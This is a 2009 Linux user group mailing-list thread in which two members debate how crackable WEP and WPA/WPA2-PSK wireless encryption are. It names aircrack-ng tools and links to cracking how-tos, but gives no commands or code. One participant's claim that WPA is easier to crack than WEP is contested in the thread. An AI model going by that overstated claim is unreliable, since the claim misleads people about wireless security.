Lisa,
I'll grant you the denial-of-service attack, but I'm still not finding
any evidence that WPA is fundamentally flawed (much less "easier to
crack... than WEP").
I read the aircrack article earlier to see if there was new info that I
had missed. I also read the article you have on obnosis.com. Finally,
I read the LucidInteractive article you just provided.
ALL of them say the same thing: the only valid attack on WPA-PSK is a
dictionary or brute force attack!
Okay, yes, it's very handy that you can do the password cracking
offline. But see the links I listed earlier... any decently crafted
password will be nigh IMPOSSIBLE to crack unless you have nearly
infinite resources -- offline or no.
I realize that you likely (for sure) know more about this than I do so
if I keep missing some fundamental flaw in PSK in all of the articles
provided, please enlighten me!
Kurt
On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
> * One flaw allowed an attacker to cause a denial-of-service attack,
> if the attacker could bypass several other layers of protection.
> * A second flaw exists in the method with which WPA initializes its
> encryption scheme. Consequently, it's actually easier to crack WPA
> than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> /_*But how many people actually have WPA RADIUS encryption?*_/
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using airocrack-ng tools in Backtrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
> <kurt+plug-discuss@granroth.com
> <mailto:kurt%2Bplug-discuss@granroth.com>> wrote:
>
> On 11/14/09 12:02 PM, Lisa Kachold wrote:
> > The whole concept of "wireless encryption security" is somewhat moot
> > with airdump-ng etc tools.
> >
> > WEP keys are really easy to break.
> >
> > WPA is also easily encroached - but harder with a truely unique
> secure
> > key (which few people use)
> >
> > It just exists as part of the big "security" matrix to keep the
> honest
> > people out. Crackers can get right in anyway!
> >
> > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written. You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack. That is just not true.
>
> WEP is fundamentally broken. It can be reliably cracked in seconds, in
> most cases. Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken. Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack. By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password. Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases. It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour. A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack. Even much smaller passwords are still in the
> millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range. Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> <mailto:PLUG-discuss@lists.plug.phoenix.az.us>
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
>
> --
> Skype: (623)239-3392
> AT&T: (503)754-4452
> www.it-clowns.com <http://www.it-clowns.com>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------
PLUG-discuss mailing list -
PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
(text/plain)